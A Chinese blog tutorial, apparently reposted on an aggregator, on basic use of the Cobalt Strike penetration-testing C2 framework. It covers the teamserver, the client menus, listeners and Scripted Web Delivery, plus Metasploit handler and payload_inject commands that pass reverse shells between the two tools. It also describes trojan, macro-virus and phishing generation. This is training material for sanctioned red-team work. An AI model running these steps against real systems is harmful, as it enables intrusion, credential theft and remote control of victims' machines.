主頁 >  其他 > Cobalt Strike基本使用

Cobalt Strike基本使用

2021-11-02 07:17:10 其他

Cobalt Strike簡介

Cobalt Strike是一款由java撰寫的全平臺多方協同滲透測驗框架,在3.0版本之前它基于Metasploit框架作業,在3.0后的版本以獨立成一個滲透測驗平臺,CobaltStrike集成了埠轉發、埠掃描、socket代理、提權、釣魚、遠控木馬等功能,該工具幾乎覆寫了APT攻擊鏈中所需要用到的各個技識訓節,且其最大的優點在于可以進行團隊合作和優越的UI界面,

Cobalt Strike檔案結構

│  agscript 拓展應用的腳本
│  c2lint  檢查profile的錯誤例外
│  cobaltstrike  客戶端程式
│  cobaltstrike.jar 
│  logs  日志
│  data  TeamServer的一些資料
│  teamserver  團隊服務器程式
│  update  用于更新Cobalt Strike
│  update.jar
│ third-party 第三方工具

Cobalt Strike使用

CobaltStrike分為客戶端和服務端,Cobalt Strike 需要團隊服務器才能使用,

(1)啟動TeamServer

./teamserver 192.168.178.128 123456  #ip為本機服務器ip  123456為設定的密碼

如果要將團隊服務器部署在公網上,記得加強密碼強度,防止團隊服務器密碼被破解

(2)啟動Cobalt Strike Client

Host為團隊服務器ip地址

Port為默認埠

User為連接的用戶,用戶可以自行選擇

Password為團隊服務器設定的密碼

點擊Connect連接之后

 再點擊是,則加入成功,

Cobalt Strike模塊詳解

Cobalt Strike模塊

New Connection     # 新建連接,支持連接多個服務器端
Preferences        # 設定Cobal Strike界面、控制臺、以及輸出報告樣式、TeamServer連接記錄
Visualization      # 主要展示輸出結果的視圖
VPN Interfaces     # 設定VPN介面
Listenrs           # 創建監聽器
Script Manager     # 腳本管理,可以通過AggressorScripts腳本來加強自身,能夠擴展選單欄,Beacon命令列,提權腳本等
Close              # 退出連接

View模塊

Applications      # 顯示受害主機的應用資訊
Credentials       # 顯示所有以獲取的受害主機的憑證,如hashdump、Mimikatz
Downloads         # 查看已下載檔案
Event Log         # 主機上線記錄以及團隊協作聊天記錄
Keystrokes        # 查看鍵盤記錄結果
Proxy Pivots      # 查看代理模塊
Screenshots       # 查看所有螢屏截圖
Script Console    # 加載第三方腳本以增強功能 
Targets           # 顯示所有受害主機
Web Log           # 所有Web服務的日志

Attacks模塊

Packages

HTML Application                # 生成(executable/VBA/powershell)這三種原理實作的惡意HTA木馬檔案
MS Office Macro                 # 生成office宏病毒檔案
Payload Generator               # 生成各種語言版本的payload
Windows Executable              # 生成可執行exe木馬
Windows Executable(Stageless)   # 生成無狀態的可執行exe木馬

Web-Drive-by

Manage                  # 對開啟的web服務進行管理
Clone Site              # 克隆網站,可以記錄受害者提交的資料
Host File               # 提供檔案下載,可以選擇Mime型別
Scripted Web Delivery   # 為payload提供web服務以便下載和執行,類似于Metasploit的web_delivery 
Signed Applet Attack    # 使用java自簽名的程式進行釣魚攻擊(該方法已過時)
Smart Applet Attack     # 自動檢測java版本并進行攻擊,針對Java 1.6.0_45以下以及Java 1.7.0_21以下版本(該方法已過時)
Spear Phish             # 魚叉釣魚郵件

Reporting模塊

Activity Report                      # 活動報告
Hosts Report                         # 主機報告
Indicators of Compromise             # IOC報告:包括C2組態檔的流量分析、域名、IP和上傳檔案的MD5 hashes
Sessions Report                      # 會話報告
Social Engineering Report            # 社會工程報告:包括魚叉釣魚郵件及點擊記錄
Tactics, Techniques, and Procedures  # 戰術技術及相關程式報告:包括行動對應的每種戰術的檢測策略和緩解策略
Reset Data                           # 重置資料
Export Data                          # 匯出資料,匯出.tsv檔案格式

Help模塊

 

Homepage             # 官方主頁
Support              # 技術支持
Arsenal              # 開發者
System information   # 版本資訊
About                # 關于

 工具導航欄

1.新建連接
2.斷開當前連接
3.監聽器
4.改變視圖為Pivot Graph(視圖串列)
5.改變視圖為Session Table(會話串列)
6.改變視圖為Target Table(目標串列)
7.顯示所有以獲取的受害主機的憑證
8.查看已下載檔案
9.查看鍵盤記錄結果
10.查看螢屏截圖
11.生成無狀態的可執行exe木馬
12.使用java自簽名的程式進行釣魚攻擊
13.生成office宏病毒檔案
14.為payload提供web服務以便下載和執行
15.提供檔案下載,可以選擇Mime型別
16.管理Cobalt Strike上運行的web服務
17.幫助
18.關于

利用Cobalt Strike獲取一個Beacon

1、創建Listener

在Listeners的面板中點擊Add

然后輸入名稱(任意),選擇監聽器型別,團隊服務器ip和監聽埠保存即可,

然后在監聽的面板中就可以看到我們的監聽器

在有了監聽器之后,我們就可以選擇我們的攻擊模塊進行漏洞利用了,我們這里選擇Scripted Web Delivery攻擊模塊(為payload提供web服務以便下載和執行,類似于Metasploit的web_delivery) 

 

然后配置號監聽埠和監聽器后點擊Launch

 

然后會生成一個payload

復制payload在powershell中執行,肉雞即可上線

我們可以進如Interact的互動模式進行執行命令

Cobalt Strike功能詳解

Listeners(監聽模塊)

在監聽模塊中內置了八個內置payload

wndows/beacon_dns/reverse_dns_txt

windows/beacon_http/reverse_http

windows/beacon_https/reverse_https

windows/beacon_bind_pipe

windows/beacon_tcp

windows/beacon_extc2

windows/foreign/reverse_http

windows/foreign/reverse_https

這些payload中windows/beacon為內置監聽器,且有dns、http、https、smb、tcp、extc2六種監聽方式,windows/foreign為外部監聽器,

內置監聽器的使用原理和之前配置監聽器原理大致相同,這里主要再演示一下外部監聽器的使用,

首先我們選擇外置監聽器Foreign模塊,填寫相關配置內容

然后打開在msf中配置相應監聽模塊

msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set lhost 192.168.178.128  #此處的IP地址和監聽埠要和cs中設定的保持一致
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > run

配置好之后我們就可以通過此監聽器來傳遞我們的shell了,點擊spawn

選擇我們設定的msf這個外監聽器

這樣在msf這邊就可以接受到cs這邊傳遞過來的shell

這里講述到了cs傳遞shell到msf,就不得不在提一提msf傳遞到cs了,

首先我們把剛才接受到的session退出,這里記住這個session的id為1

然后使用模塊

msf5 exploit(multi/handler) > use exploit/windows/local/payload_inject 
msf5 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http #切記這里的payload的協議要與cs的一致

選擇上了這個模塊之后我們在回到cs上創建一個監聽器,我這里有個之前創建好的監聽器

 那我們繼續回到msf上配置session和lhost和lport(切記這里的lhost和lport要和cs上監聽器上配置的是一致的)

然后run執行在cs上等待上線即可,

Attacks(攻擊模塊)

Scripted Web Delivery

上面演示的是使用attacks模塊中的scripted web delivery模塊來進行拿到靶機的shell

這里有幾個配置選項

URL Path:存放payload的位置
Local Host:團隊服務器ip地址
Local Port:團隊服務器埠
Listener:監聽器
Type:要選擇的腳本型別

全部配置好了之后,點擊launch后,會彈出payload

在靶機上運行之后,靶機會在Teamserver下載payload,然后執行并加載到記憶體中,從而獲取主機的Beacon,

Manage

我們生成的監聽器和一些payload都能在這里進行管理,

Windows Executable

使用方法也和之前大致相同,配置好監聽器和Output即可,這里的Output分為EXE和DLL兩種型別,

Windows EXE:windows的可執行檔案
Windows Service EXE:基于服務的windows可執行檔案,可以將可執行檔案添加到服務中,
Windows DLL:DLL檔案,一般用于DLL劫持、提權和反彈Beacon,

Payload Generator

配置監聽器,選擇對應腳本語言即可,

__EOF__

作者: 隨風kali
本文鏈接: https://www.cnblogs.com/sfsec/p/15302595.html
著作權宣告: 本博客所有文章除特別宣告外,均采用 BY-NC-SA 許可協議,轉載請注明出處!
聲援博主: 如果您覺得文章對您有幫助,可以點擊文章右下角推薦一下,您的鼓勵是博主的最大動力!

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/343929.html

標籤:其他

上一篇:gitlab-runner找不到git

下一篇:來自帶有Squashed合并的分支的GitRebase

標籤雲
其他(157675) Python(38076) JavaScript(25376) Java(17977) C(15215) 區塊鏈(8255) C#(7972) AI(7469) 爪哇(7425) MySQL(7132) html(6777) 基礎類(6313) sql(6102) 熊猫(6058) PHP(5869) 数组(5741) R(5409) Linux(5327) 反应(5209) 腳本語言(PerlPython)(5129) 非技術區(4971) Android(4554) 数据框(4311) css(4259) 节点.js(4032) C語言(3288) json(3245) 列表(3129) 扑(3119) C++語言(3117) 安卓(2998) 打字稿(2995) VBA(2789) Java相關(2746) 疑難問題(2699) 细绳(2522) 單片機工控(2479) iOS(2429) ASP.NET(2402) MongoDB(2323) 麻木的(2285) 正则表达式(2254) 字典(2211) 循环(2198) 迅速(2185) 擅长(2169) 镖(2155) 功能(1967) .NET技术(1958) Web開發(1951) python-3.x(1918) HtmlCss(1915) 弹簧靴(1913) C++(1909) xml(1889) PostgreSQL(1872) .NETCore(1853) 谷歌表格(1846) Unity3D(1843) for循环(1842)

熱門瀏覽
  • 網閘典型架構簡述

    網閘架構一般分為兩種:三主機的三系統架構網閘和雙主機的2+1架構網閘。 三主機架構分別為內端機、外端機和仲裁機。三機無論從軟體和硬體上均各自獨立。首先從硬體上來看,三機都用各自獨立的主板、記憶體及存盤設備。從軟體上來看,三機有各自獨立的作業系統。這樣能達到完全的三機獨立。對于“2+1”系統,“2”分為 ......

    uj5u.com 2020-09-10 02:00:44 more
  • 如何從xshell上傳檔案到centos linux虛擬機里

    如何從xshell上傳檔案到centos linux虛擬機里及:虛擬機CentOs下執行 yum -y install lrzsz命令,出現錯誤:鏡像無法找到軟體包 前言 一、安裝lrzsz步驟 二、上傳檔案 三、遇到的問題及解決方案 總結 前言 提示:其實很簡單,往虛擬機上安裝一個上傳檔案的工具 ......

    uj5u.com 2020-09-10 02:00:47 more
  • 一、SQLMAP入門

    一、SQLMAP入門 1、判斷是否存在注入 sqlmap.py -u 網址/id=1 id=1不可缺少。當注入點后面的引數大于兩個時。需要加雙引號, sqlmap.py -u "網址/id=1&uid=1" 2、判斷文本中的請求是否存在注入 從文本中加載http請求,SQLMAP可以從一個文本檔案中 ......

    uj5u.com 2020-09-10 02:00:50 more
  • Metasploit 簡單使用教程

    metasploit 簡單使用教程 浩先生, 2020-08-28 16:18:25 分類專欄: kail 網路安全 linux 文章標簽: linux資訊安全 編輯 著作權 metasploit 使用教程 前言 一、Metasploit是什么? 二、準備作業 三、具體步驟 前言 Msfconsole ......

    uj5u.com 2020-09-10 02:00:53 more
  • 游戲逆向之驅動層與用戶層通訊

    驅動層代碼: #pragma once #include <ntifs.h> #define add_code CTL_CODE(FILE_DEVICE_UNKNOWN,0x800,METHOD_BUFFERED,FILE_ANY_ACCESS) /* 更多游戲逆向視頻www.yxfzedu.com ......

    uj5u.com 2020-09-10 02:00:56 more
  • 北斗電力時鐘(北斗授時服務器)讓網路資料更精準

    北斗電力時鐘(北斗授時服務器)讓網路資料更精準 北斗電力時鐘(北斗授時服務器)讓網路資料更精準 京準電子科技官微——ahjzsz 近幾年,資訊技術的得了快速發展,互聯網在逐漸普及,其在人們生活和生產中都得到了廣泛應用,并且取得了不錯的應用效果。計算機網路資訊在電力系統中的應用,一方面使電力系統的運行 ......

    uj5u.com 2020-09-10 02:01:03 more
  • 【CTF】CTFHub 技能樹 彩蛋 writeup

    ?碎碎念 CTFHub:https://www.ctfhub.com/ 筆者入門CTF時時剛開始刷的是bugku的舊平臺,后來才有了CTFHub。 感覺不論是網頁UI設計,還是題目質量,賽事跟蹤,工具軟體都做得很不錯。 而且因為獨到的金幣制度的確讓人有一種想去刷題賺金幣的感覺。 個人還是非常喜歡這個 ......

    uj5u.com 2020-09-10 02:04:05 more
  • 02windows基礎操作

    我學到了一下幾點 Windows系統目錄結構與滲透的作用 常見Windows的服務詳解 Windows埠詳解 常用的Windows注冊表詳解 hacker DOS命令詳解(net user / type /md /rd/ dir /cd /net use copy、批處理 等) 利用dos命令制作 ......

    uj5u.com 2020-09-10 02:04:18 more
  • 03.Linux基礎操作

    我學到了以下幾點 01Linux系統介紹02系統安裝,密碼啊破解03Linux常用命令04LAMP 01LINUX windows: win03 8 12 16 19 配置不繁瑣 Linux:redhat,centos(紅帽社區版),Ubuntu server,suse unix:金融機構,證券,銀 ......

    uj5u.com 2020-09-10 02:04:30 more
  • 05HTML

    01HTML介紹 02頭部標簽講解03基礎標簽講解04表單標簽講解 HTML前段語言 js1.了解代碼2.根據代碼 懂得挖掘漏洞 (POST注入/XSS漏洞上傳)3.黑帽seo 白帽seo 客戶網站被黑帽植入劫持代碼如何處理4.熟悉html表單 <html><head><title>TDK標題,描述 ......

    uj5u.com 2020-09-10 02:04:36 more
最新发布
  • 2023年最新微信小程式抓包教程

    01 開門見山 隔一個月發一篇文章,不過分。 首先回顧一下《微信系結手機號資料庫被脫庫事件》,我也是第一時間得知了這個訊息,然后跟蹤了整件事情的經過。下面是這起事件的相關截圖以及近日流出的一萬條資料樣本: 個人認為這件事也沒什么,還不如關注一下之前45億快遞資料查詢渠道疑似在近日復活的訊息。 訊息是 ......

    uj5u.com 2023-04-20 08:48:24 more
  • web3 產品介紹:metamask 錢包 使用最多的瀏覽器插件錢包

    Metamask錢包是一種基于區塊鏈技術的數字貨幣錢包,它允許用戶在安全、便捷的環境下管理自己的加密資產。Metamask錢包是以太坊生態系統中最流行的錢包之一,它具有易于使用、安全性高和功能強大等優點。 本文將詳細介紹Metamask錢包的功能和使用方法。 一、 Metamask錢包的功能 數字資 ......

    uj5u.com 2023-04-20 08:47:46 more
  • vulnhub_Earth

    前言 靶機地址->>>vulnhub_Earth 攻擊機ip:192.168.20.121 靶機ip:192.168.20.122 參考文章 https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html https://www.cnb ......

    uj5u.com 2023-04-20 07:46:20 more
  • 從4k到42k,軟體測驗工程師的漲薪史,給我看哭了

    清明節一過,盲猜大家已經無心上班,在數著日子準備過五一,但一想到銀行卡里的余額……瞬間心情就不美麗了。最近,2023年高校畢業生就業調查顯示,本科畢業月平均起薪為5825元。調查一出,便有很多同學表示自己又被平均了。看著這一資料,不免讓人想到前不久中國青年報的一項調查:近六成大學生認為畢業10年內會 ......

    uj5u.com 2023-04-20 07:44:00 more
  • 最新版本 Stable Diffusion 開源 AI 繪畫工具之中文自動提詞篇

    🎈 標簽生成器 由于輸入正向提示詞 prompt 和反向提示詞 negative prompt 都是使用英文,所以對學習母語的我們非常不友好 使用網址:https://tinygeeker.github.io/p/ai-prompt-generator 這個網址是為了讓大家在使用 AI 繪畫的時候 ......

    uj5u.com 2023-04-20 07:43:36 more
  • 漫談前端自動化測驗演進之路及測驗工具分析

    隨著前端技術的不斷發展和應用程式的日益復雜,前端自動化測驗也在不斷演進。隨著 Web 應用程式變得越來越復雜,自動化測驗的需求也越來越高。如今,自動化測驗已經成為 Web 應用程式開發程序中不可或缺的一部分,它們可以幫助開發人員更快地發現和修復錯誤,提高應用程式的性能和可靠性。 ......

    uj5u.com 2023-04-20 07:43:16 more
  • CANN開發實踐:4個DVPP記憶體問題的典型案例解讀

    摘要:由于DVPP媒體資料處理功能對存放輸入、輸出資料的記憶體有更高的要求(例如,記憶體首地址128位元組對齊),因此需呼叫專用的記憶體申請介面,那么本期就分享幾個關于DVPP記憶體問題的典型案例,并給出原因分析及解決方法。 本文分享自華為云社區《FAQ_DVPP記憶體問題案例》,作者:昇騰CANN。 DVPP ......

    uj5u.com 2023-04-20 07:43:03 more
  • msf學習

    msf學習 以kali自帶的msf為例 一、msf核心模塊與功能 msf模塊都放在/usr/share/metasploit-framework/modules目錄下 1、auxiliary 輔助模塊,輔助滲透(埠掃描、登錄密碼爆破、漏洞驗證等) 2、encoders 編碼器模塊,主要包含各種編碼 ......

    uj5u.com 2023-04-20 07:42:59 more
  • Halcon軟體安裝與界面簡介

    1. 下載Halcon17版本到到本地 2. 雙擊安裝包后 3. 步驟如下 1.2 Halcon軟體安裝 界面分為四大塊 1. Halcon的五個助手 1) 影像采集助手:與相機連接,設定相機引數,采集影像 2) 標定助手:九點標定或是其它的標定,生成標定檔案及內參外參,可以將像素單位轉換為長度單位 ......

    uj5u.com 2023-04-20 07:42:17 more
  • 在MacOS下使用Unity3D開發游戲

    第一次發博客,先發一下我的游戲開發環境吧。 去年2月份買了一臺MacBookPro2021 M1pro(以下簡稱mbp),這一年來一直在用mbp開發游戲。我大致分享一下我的開發工具以及使用體驗。 1、Unity 官網鏈接: https://unity.cn/releases 我一般使用的Apple ......

    uj5u.com 2023-04-20 07:40:19 more